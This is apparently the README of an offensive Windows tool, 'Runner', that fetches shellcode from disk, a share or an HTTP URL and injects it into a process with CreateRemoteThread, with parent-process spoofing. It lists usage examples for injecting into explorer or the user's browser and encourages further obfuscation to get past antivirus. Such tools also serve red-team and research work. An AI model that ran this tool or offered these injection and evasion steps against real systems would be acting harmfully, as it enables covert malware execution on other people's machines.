Note: We had a good run for a few years. By now, this triggers most AV, even with obfuscation. Non-trivial obsfuscation may still work though. Anyways, if you wish to use this in any sort of secured environment, you may want to tweak it a bit and add some more subtlety.
This project started out as a fork of ZPS' ProcessInjection. However, i've greatly improved its flexibility from a CLI perspective as well as added multiple techniques for pulling and injecting shellcode. Shellcode can be dynamically pulled shellcode (in bin or base64 format) from either the disk or over HTTP as opposed to embedding the shellcode in the binary.
Additional Techniques yoinked from 3xpl01tc0d3r: https://github.com/3xpl01tc0d3r/ProcessInjection/blob/master/ProcessInjection/Program.cs
Runner Help:
Usage: Runner.exe [options]
Example: Runner.exe targ=http://fun/targ.bin form=bin meth=simple pid=1000
Example: Runner.exe targ=C:\path\to\targ.b64 form=b64 meth=simple pid=self
Example: Runner.exe targ=\\some\share\path\to\targ.b64 form=b64 meth=simple pid=explorer
Example: Runner.exe targ=https://fun/targ.bin parent=1000 spawn=C:\path\to\custom.exe
Example: Runner.exe targ=https://fun/targ.bin parent=explorer spawn=notepad.exe
Defaults:
meth => simple
form => bin
The targ argument can point to a URL or path on disk. URLs must start with http:// or https://. This file should contain your shellcode. .Net shellcode can be generated via Donut by TheWover.
The form argument tells the runner whether the shellcode is in "binary" format (default) or "base64. Valid values are "bin", "binary", "base64", and "b64". If encoded, the runner will decode it.
The meth argument tells the runner what technique to use for injection. Right now, only "simple" injection is supported (default) via CreateRemoteThread.
You can either target a live process (PID / live mode) to inject into or you can use parent spoofing. PID mode requires the use of the pid arugment while parent spoofing requires both parent and spawn.
The pid value accepts a valid PID, a program to search for (explorer.exe/notepad.exe), or "self". When searching, the pid is resolved from the current session so the process needs to be in the same session. For self, the runner will just inject into itself and wait forever. There is an additional alias called browser that attempts to first inject into the user's default browser and then blindly checks for running chrome and IE instances.
The parent argument can be either a valid running PID or a program name (explorer/program.exe). When searching for the program name, a running PID for that program must exist in the same session.
The spawn argument tells the runner which program to spawn and inject into. It can either be a fully qualified path to an EXE or a basename like "explorer.exe". The runner will search the $PATH environment variable for the executable. The spawn argument also has a browser alias that looks for common brower executables.
- cmd.exe may not work with spawn.
- .Net ShellCode https://github.com/TheWover/donut
- Parent Spoofing: https://github.com/3xpl01tc0d3r/ProcessInjection/blob/master/ProcessInjection/Program.cs
- Process hollowing
- APC Queue
- Clean up Win32
- Simple targets and keys
- Parseable targets via regex